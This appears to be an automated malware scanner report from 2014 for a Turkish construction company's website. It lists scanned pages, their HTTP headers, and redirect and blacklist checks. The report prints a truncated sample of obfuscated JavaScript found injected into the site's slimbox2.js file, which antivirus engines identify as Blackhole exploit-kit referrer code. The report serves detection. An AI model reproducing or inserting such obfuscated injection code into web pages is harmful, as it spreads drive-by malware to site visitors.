New scan:

Malware Scanner report for reisinsaat.com.tr

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://reisinsaat.com.tr/
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 22:58:26 GMT
Accept-Ranges: bytes
ETag: "6e4bc564588ce1:121a6"
Server: Microsoft-IIS/6.0
Content-Length: 22734
Content-Location: http://reisinsaat.com.tr/Index.html
Content-Type: text/html
Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
clean
http://reisinsaat.com.tr/index.html
200 OK
Content-Length: 22734
Content-Type: text/html
clean
http://reisinsaat.com.tr/jscookmenu.min.js
200 OK
Content-Length: 19311
Content-Type: application/x-javascript
clean
http://reisinsaat.com.tr/jquery-1.7.2.min.js
200 OK
Content-Length: 94840
Content-Type: application/x-javascript
clean
http://reisinsaat.com.tr/images/sly1.jpg
200 OK
Content-Length: 280242
Content-Type: image/jpeg
clean
http://reisinsaat.com.tr/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://reisinsaat.com.tr/images/sly2.jpg
200 OK
Content-Length: 282957
Content-Type: image/jpeg
clean
http://reisinsaat.com.tr/./Ic-Dekorasyon.html
200 OK
Content-Length: 17998
Content-Type: text/html
clean
http://reisinsaat.com.tr/./jscookmenu.min.js
200 OK
Content-Length: 19311
Content-Type: application/x-javascript
clean
http://reisinsaat.com.tr/./jquery-1.7.2.min.js
200 OK
Content-Length: 94840
Content-Type: application/x-javascript
clean
http://reisinsaat.com.tr/./slimbox/js/slimbox2.js
200 OK
Content-Length: 8603
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=1
... 3718 bytes are skipped ...
4,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74"["split"](",");}w=f;s=[];for(i=2-2;-i+1372!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.11
Comodo
TrojWare.JS.BlacoleRef.CZ
Norman
Blacole.TF

http://reisinsaat.com.tr/./images/dekore1.jpg
200 OK
Content-Length: 122337
Content-Type: image/jpeg
clean
http://reisinsaat.com.tr/./images/dekore4.jpg
200 OK
Content-Length: 169994
Content-Type: image/jpeg
clean
http://reisinsaat.com.tr/./images/dekore5.jpg
200 OK
Content-Length: 217497
Content-Type: image/jpeg
clean
http://reisinsaat.com.tr/./images/dekore7.jpg
200 OK
Content-Length: 152974
Content-Type: image/jpeg
clean
http://reisinsaat.com.tr/./images/dekore8.jpg
200 OK
Content-Length: 300419
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: reisinsaat.com.tr

Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 22:58:26 GMT
Accept-Ranges: bytes
ETag: "6e4bc564588ce1:121a6"
Server: Microsoft-IIS/6.0
Content-Length: 22734
Content-Location: http://reisinsaat.com.tr/Index.html
Content-Type: text/html
Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...22734 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: reisinsaat.com.tr
Referer: http://www.google.com/search?q=reisinsaat.com.tr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=reisinsaat.com.tr

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://reisinsaat.com.tr/

Result: reisinsaat.com.tr is not infected or malware details are not published yet.